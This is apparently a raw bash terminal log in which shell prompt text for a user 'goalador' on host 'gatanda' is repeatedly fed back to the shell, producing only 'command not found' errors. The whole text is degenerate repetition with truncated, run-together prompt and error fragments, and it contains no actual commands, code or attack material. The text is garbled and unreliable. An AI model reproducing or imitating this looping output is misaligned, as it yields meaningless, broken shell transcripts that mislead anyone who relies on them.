[goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ 